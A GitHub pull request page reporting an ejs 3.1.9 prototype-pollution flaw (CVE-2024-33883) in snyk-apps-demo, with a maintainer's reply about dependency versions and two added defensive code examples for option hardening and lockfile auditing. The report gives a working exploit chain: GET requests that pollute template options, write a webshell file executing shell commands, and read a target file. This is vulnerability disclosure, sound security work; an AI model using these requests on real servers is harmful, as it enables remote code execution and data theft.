
fix(deps): Insufficient Prototype Pollution Validation Leading to RCE Exploitation #120

Open, wants to merge 1 commit into base: main

Conversation

lamcodeofpwnosec

The snyk/snyk-apps-demo project uses ejs (aka Embedded JavaScript templates), which lacks certain pollution protection. ejs@3.1.9: Insufficient Prototype Pollution Validation Leading to RCE Exploitation

  • With prototype pollution, set opts.client to a truthy value (condition)
  • Then, when render() runs, ejs will run the opts.escapeFunction value as JS code.
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell

Payloads:

function RCE( key ){ 
 const result = process.mainModule.require('child_process').execSync(`${key}`); 
 throw new Error(`Result leak from Error: ${result.toString()}`); 
}
 module.exports = RCE;

CWE-693
CWE-1321
CVE-2024-33883
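The mechanism the report above relies on, shown from the defender's side as an added example that is not code from the snyk-apps-demo project or from ejs: an option reader that honours properties inherited through the prototype chain versus one that only honours own properties, a sanitizer that rebuilds options onto a null prototype, a guard that refuses a non-function `escapeFunction`, and a check that lists sensitive keys found on a prototype. All function names (`readOptionUnsafe`, `readOptionSafe`, `sanitizeOptions`, `resolveEscapeFunction`, `pollutedKeys`, `demo`) are assumptions for illustration; the pollution is emulated with a local prototype object rather than by modifying the global `Object.prototype`.

```javascript
'use strict';
// Added example, not from ejs or snyk-apps-demo. Function names are hypothetical.

// Naive reader: `opts[name]` resolves through the prototype chain, so a
// polluted prototype can switch on a feature the caller never asked for.
function readOptionUnsafe(opts, name, fallback) {
  return opts[name] !== undefined ? opts[name] : fallback;
}

// Hardened reader: only an own property of `opts` counts.
function readOptionSafe(opts, name, fallback) {
  return Object.prototype.hasOwnProperty.call(opts, name) ? opts[name] : fallback;
}

// Rebuild the option object onto a null prototype so inherited keys are dropped.
function sanitizeOptions(opts) {
  const clean = Object.create(null);
  for (const key of Object.keys(opts)) clean[key] = opts[key];
  return clean;
}

// Guard a template host can apply before rendering: accept an escape
// function only when it is an own property AND actually a function.
function resolveEscapeFunction(opts, defaultEscape) {
  if (!Object.prototype.hasOwnProperty.call(opts, 'escapeFunction')) return defaultEscape;
  const fn = opts.escapeFunction;
  if (typeof fn !== 'function') {
    throw new TypeError('escapeFunction must be a function');
  }
  return fn;
}

// Detection: which of the option keys named in the report appear as own
// properties of a prototype (defaults to the real Object.prototype).
const SENSITIVE_KEYS = ['client', 'escapeFunction'];
function pollutedKeys(proto = Object.prototype) {
  return SENSITIVE_KEYS.filter((k) => Object.prototype.hasOwnProperty.call(proto, k));
}

// Constructed demo: emulate pollution with a custom prototype so the
// global Object.prototype is left untouched.
function demo() {
  const pollutedProto = { client: 1, escapeFunction: 'not a function' };
  const userOpts = Object.create(pollutedProto);
  userOpts.delimiter = '%';
  return {
    unsafeClient: readOptionUnsafe(userOpts, 'client', false), // 1 (inherited)
    safeClient: readOptionSafe(userOpts, 'client', false),     // false
    sanitizedKeys: Object.keys(sanitizeOptions(userOpts)),     // ['delimiter']
    detected: pollutedKeys(pollutedProto),                     // both keys
  };
}

module.exports = { readOptionUnsafe, readOptionSafe, sanitizeOptions, resolveEscapeFunction, pollutedKeys, demo };
```

The two readers differ only in the `hasOwnProperty` check, which is the whole difference between an option the caller passed and one that arrived through a polluted prototype; `pollutedKeys()` with no argument can be run periodically in a process as a cheap canary for the real `Object.prototype`.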

@lamcodeofpwnosec lamcodeofpwnosec requested a review from a team as a code owner November 10, 2024 14:39
@CLAassistant

CLAassistant commented Nov 10, 2024

CLA assistant check
All committers have signed the CLA.

@jgresty
Member

jgresty commented Nov 11, 2024

The version of ejs used as a hard dependency (3.1.10) is not impacted, only the version pulled in as a transitive dependency of ejs-lint. Generally we don't consider dev dependencies when looking at security vulnerabilities internally, however thank you for alerting us to this case.

I have noticed you bumped the version of ejs-lint in the package-lock to one incompatible with the version range specified in the package.json, this change would be reverted as soon as anyone did an npm install.
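The distinction the maintainer draws above, between the hard dependency and a transitive copy nested under a dev dependency, is something a lockfile audit can surface directly. The following is an added example, not a script from the snyk-apps-demo repository: it walks an npm v2/v3 `package-lock.json` `packages` map, lists every installed copy of a package with the parent that pulled it in and its `dev` flag, compares each version against a fixed version, and checks that root-level installs satisfy the caret ranges declared in the manifest (the mismatch the comment describes). The lockfile fragment is constructed for the demo; `findInstalledCopies`, `auditPackage`, `satisfiesCaret` and `lockMatchesManifest` are hypothetical names, and the range check supports only simple `^x.y.z` ranges.

```javascript
'use strict';
// Added example; not part of the snyk-apps-demo project. Function names are hypothetical.

// Constructed lockfile fragment in the npm v2/v3 "packages" layout. The
// real project's lockfile is not reproduced here.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { ejs: '^3.1.10' }, devDependencies: { 'ejs-lint': '^2.0.0' } },
    'node_modules/ejs': { version: '3.1.10' },
    'node_modules/ejs-lint': { version: '2.0.0', dev: true, dependencies: { ejs: '^3.1.9' } },
    'node_modules/ejs-lint/node_modules/ejs': { version: '3.1.9', dev: true },
  },
};

function parseVersion(v) { return v.split('.').map(Number); }

// Negative if a < b, 0 if equal, positive if a > b (numeric x.y.z only).
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Minimal caret semantics: same major, and version >= base. Other range
// forms are rejected so a silent "ok" is never produced for them.
function satisfiesCaret(range, version) {
  if (!range.startsWith('^')) throw new Error('only ^x.y.z ranges are supported here');
  const base = range.slice(1);
  return parseVersion(base)[0] === parseVersion(version)[0] && compareVersions(version, base) >= 0;
}

// Every installed copy of `name`, including copies nested under other packages.
function findInstalledCopies(lock, name) {
  const suffix = 'node_modules/' + name;
  return Object.entries(lock.packages)
    .filter(([p]) => p === suffix || p.endsWith('/' + suffix))
    .map(([p, meta]) => ({
      path: p,
      version: meta.version,
      dev: Boolean(meta.dev),
      // Parent is the package directory just above this copy, or the root.
      parent: p === suffix ? '(root)' : p.slice(0, p.length - suffix.length - 1).split('node_modules/').pop(),
    }));
}

// Flag each copy whose version is below the fixed version.
function auditPackage(lock, name, fixedVersion) {
  return findInstalledCopies(lock, name).map((c) => ({
    ...c,
    vulnerable: compareVersions(c.version, fixedVersion) < 0,
  }));
}

// Check that each root-level install agrees with the manifest's declared
// range; a lock bumped past the manifest range is exactly what a fresh
// `npm install` would revert.
function lockMatchesManifest(lock) {
  const root = lock.packages[''];
  const declared = { ...(root.dependencies || {}), ...(root.devDependencies || {}) };
  return Object.entries(declared).map(([name, range]) => {
    const installed = lock.packages['node_modules/' + name];
    return { name, range, installed: installed && installed.version,
             ok: Boolean(installed) && satisfiesCaret(range, installed.version) };
  });
}

module.exports = { SAMPLE_LOCK, compareVersions, satisfiesCaret, findInstalledCopies, auditPackage, lockMatchesManifest };
```

Running `auditPackage(SAMPLE_LOCK, 'ejs', '3.1.10')` on the constructed lock reports the root copy as clean and the copy under `ejs-lint` as vulnerable and dev-only, which is the split the maintainer's comment describes; `lockMatchesManifest` is the check that would have caught the incompatible `ejs-lint` bump before it was pushed.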
